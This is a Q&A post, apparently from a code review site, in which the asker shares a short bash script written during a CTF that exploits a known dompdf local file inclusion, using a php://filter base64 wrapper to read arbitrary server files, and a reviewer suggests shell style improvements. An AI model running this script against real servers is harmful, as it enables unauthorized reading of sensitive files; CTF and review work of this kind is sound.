# Dompdf LFI (Local File Inclusion)

Tags: bash

## Intro

During a CTF I encountered a dompdf LFI vulnerability, which is explained at [exploitdb](https://www.exploit-db.com/exploits/33004/).

However when I executed that vulnerability it gave it to me in PDF form, and it was a pain to constantly (read, strip, and base64 decode)  to read the contents of files. So I made a little bash script to do these things automatically.

I am happy with the result, but I thought there maybe was a way to resolve those double `sed` into one Regex capture. It works because the `[( ... )]` is unique in the resulting string.

## Code

```
#!/bin/bash
if [ -z "$1" ] || [ -z "$2" ]; then
    echo "Usage ./read_dompdf [url_to_dompdf] [path/to/file]"; exit
fi
URL="$1/dompdf.php?input_file=php://filter/convert.base64-encode/resource=$2"
echo `curl --silent $URL` | sed 's/.*\[(//' | sed 's/)\].*//' | base64 -d
```

Comment: I edited your question to add the URL I think you meant to link to originally. If it's wrong, feel free to change it again.

Comment: @Coal_ I've added the correct link again, seem to have removed it when I removed the clutter from the question. Thnx

Answer (score 3, accepted):

#### Input validation

I find this an unusual way to validate script parameters:

> ```
> if [ -z "$1" ] || [ -z "$2" ]; then
> ```

It's more common to verify that there are exactly two parameters:

```
if [ $# != 2 ]; then
```

Note that this is not exactly the same as the original.
The original verifies that neither `$1` and `$2` is empty,
and it silently allows more than 2 parameters.

#### Why `echo` a sub-shell?

What is the purpose of this `echo`:

> ```
> echo `curl --silent $URL`
> ```

Instead of simply:

```
curl --silent $URL
```

If the purpose is to join multiple lines into one, I would use `tr` instead:

```
curl --silent "$URL" | tr -d '\n'
# or
curl --silent "$URL" | tr '\n' ' '
```

Writing this way make the intention more clear.
Another advantage is streamlined processing.
Note also that I added double-quotes around the `$URL` used as command parameter, as a good rule of thumb to protect from unexpected word splitting and globbing.

#### One `sed` to rule them all

Instead of this:

> ```
> sed 's/.*\[(//' | sed 's/)\].*//'
> ```

You can do multiple expressions with a single `sed` using multiple `-e` parameters:

```
sed -e 's/.*\[(//' -e 's/)\].*//'
```

I use the `-e` even with single expressions,
for maximum clarity.

Comment: The `echo` might be to compress whitespace, or to expand globs... (probably not).